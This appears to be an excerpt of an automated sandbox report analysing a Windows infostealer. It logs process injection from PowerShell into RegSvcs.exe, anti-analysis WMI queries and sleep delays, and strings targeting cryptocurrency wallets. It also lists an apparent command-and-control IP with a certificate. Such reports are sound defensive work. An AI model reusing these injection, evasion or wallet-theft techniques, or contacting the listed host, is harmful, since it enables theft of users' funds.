      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      barindex
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_PhysicalMemory
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_PhysicalMemory
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9832Jump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 9945Jump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 36000Jump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 35890Jump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 35781Jump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 35672Jump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 35562Jump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 35453Jump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 35344Jump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 35219Jump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 35109Jump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 35000Jump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 34891Jump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 34781Jump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 34672Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
      Source: RegSvcs.exe, 00000003.00000002.158643986035.0000000000F85000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllB
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: page read and write | page guardJump to behavior

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Source: RegSvcs.exe, 00000003.00000002.158646258869.0000000002EDE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 92.255.57.112MIIE3jCCAsagAwIBAgIQAMyl7gKxD8R/bGWvMD10ZTANBgkqhkiG9w0BAQ0FADAQMQ4wDAYDVQQDDAVXaXB3dzAgFw0yNTAxMDMwMDU2NDNaGA85OTk5MTIzMTIzNTk1OVowEDEOMAwGA1UEAwwFV2lwd3cwggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoICAQCJBHoD8dGnUp6uYikMPGLQueXv2m1Xu0heqNGi2rCJpNYbl6KI9IV6SjdkExryLeKPYYSlWJ7DpE1Q7MIziyKNfFegW9a8TG2e/iEzAEo/tpV7x9RPIcRQ/edfva5A7UXDwXtDOBoYut0QSFv09mPd+CTwBK2QBs0oGsqD/xOsjVYJJ4KX1Hd96OdFoMaocbr2/5Vd8byNHtQ+l5gorVyZF2uB8sq3Atk6wnNCp2LpnVn0fLwXr1M5IrgyIGBJlxgnApZhEK4fw9312ERy4LBTeYPi0l4CWlSHSZtthWyfNpn0jl+yg+C6nt4Ty6Ddbs9Ch014fZot/dxSYY4HaEpGNiLJ6+wDTmiTtxPBYp9q6+zAR9HhQdrby9L2vhbmIbbVrD3TR+5TcegrQ8itsRmEzDIS+F7fnCxwtWuYfDYXSl0bjIgMfCzROhBr2AAWjU8YQLZjaeJ1AdBHDnwNXYeT75YAbl8ZjtKlQVknG+OW3CwtOxSQZ+fxg4ksAiddtvvGH3e4sqkmwEhX4YOTN3F+ueUINzIPBqLNOhwezuUzyOVedqJhEspsMOG7tN+2HOjLyMUxyT46zfa4feCZap9mmcxW1nTePXW5pSlWxOa4+PG+BOr0Cc7bPmTwBSWNnKy1dDVQyCuazmo9qJ7F9JaEW3tYtqjJheI8dPTlNcCbIwIDAQABozIwMDAdBgNVHQ4EFgQU6wPCBOLkp1AKy1BgfeO7G7mU/9wwDwYDVR0TAQH/BAUwAwEB/zANBgkqhkiG9w0BAQ0FAAOCAgEAIOkGO4X8MYgfkdBrYh0KLj11P8ETDbp9EokYcLU3xGh3qtdYRakKdtz4V2GwCWauK0sbOzIWqm+0nuF1BFG4Ff/n90e8zQy4Dx1HkrG+A/4NRiq/1ZRcUhXcEOCbCQlhREZtin6BwTno5ypVaqtWI7ip+OZZruNvVLAQaR2wPKe9W8M+ACn8ipeXGmtow9rqpnUM0KCgT36+TkDyiz6RqBxWjiyDWoodnkxuqrffZdMrob7FxYxWlXK9ODtx/88FBHz0wabvGFkHlWNAUr3BTBMyOyZZTOn08RLKDw90Uj/e9vQf9AutujdJtyhuXL/qbBVOa0bWHIbEdai5rFwo17XMBQhcVDD7cKi4UxpxdviOT3t0ALlE8Zw/NDNz/a0u+bQL3rP7+KCy4X9FidO6umTIoWRv8OSotXX+TsJf+HtG9/nBxEnBF0URXzzCTb20vTtrqfr0zeuZIZN/B0zU68bFS0FycEJVD1y47yhsBThhEVvUMWIYu/RlEENmiT5KYoHD6mcNEXvOUXYFHSiNhNP3ocZAAEirBiZWk2i/mwwd1iL6baDKt+7btwWjUUvqDtnZThWLXjsKkvk84tfiEwVBzZiv3tHotXZB6Y+ILVrE9HdE2I0zyhWIrVRE+tNQxTwb49fLxIF+SoF4K3lYK5Gnp4JYord3Uhmhmm9mZGo="Default:BAPPDATAJ3e74489724f9
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 44E000Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 450000Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: AB8008Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
      Source: RegSvcs.exe, 00000003.00000002.158646258869.0000000003262000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.158646258869.000000000328C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.158646258869.0000000003236000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
      Source: RegSvcs.exe, 00000003.00000002.158646258869.0000000003262000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.158646258869.00000000031EA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.158646258869.000000000328C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager*
      Source: RegSvcs.exe, 00000003.00000002.158646258869.0000000003236000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Managerh{Brx
      Source: RegSvcs.exe, 00000003.00000002.158646258869.0000000003262000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerTeBr
      Source: RegSvcs.exe, 00000003.00000002.158646258869.000000000328C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerTeBr(
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformationJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct

      Stealing of Sensitive Information

      barindex
      Source: RegSvcs.exe, 00000003.00000002.158646258869.00000000031DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Electrum
      Source: RegSvcs.exe, 00000003.00000002.158646258869.00000000031DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: $Br4C:\Users\user\AppData\Roaming\Exodus\exodus.wallet@\Br com.liberty.jaxx
      Source: RegSvcs.exe, 00000003.00000002.158646258869.00000000031DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: $Br4C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
      Source: RegSvcs.exe, 00000003.00000002.158646258869.00000000031DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: $Br1C:\Users\user\AppData\Roaming\Ethereum\keystore
      Source: RegSvcs.exe, 00000003.00000002.158646258869.00000000031DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Exodus
      Source: RegSvcs.exe, 00000003.00000002.158646258869.00000000031DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Ethereum
      Source: powershell.exe, 00000000.00000002.157432486635.00007FF854090000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: sqlcolumnencryptionkeystoreprovider
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-QtJump to behavior
      Source: Yara matchFile source: 00000003.00000002.158646258869.0000000002EDE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7136, type: MEMORYSTR
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts321
      Windows Management Instrumentation
      1
      DLL Side-Loading
      212
      Process Injection
      1
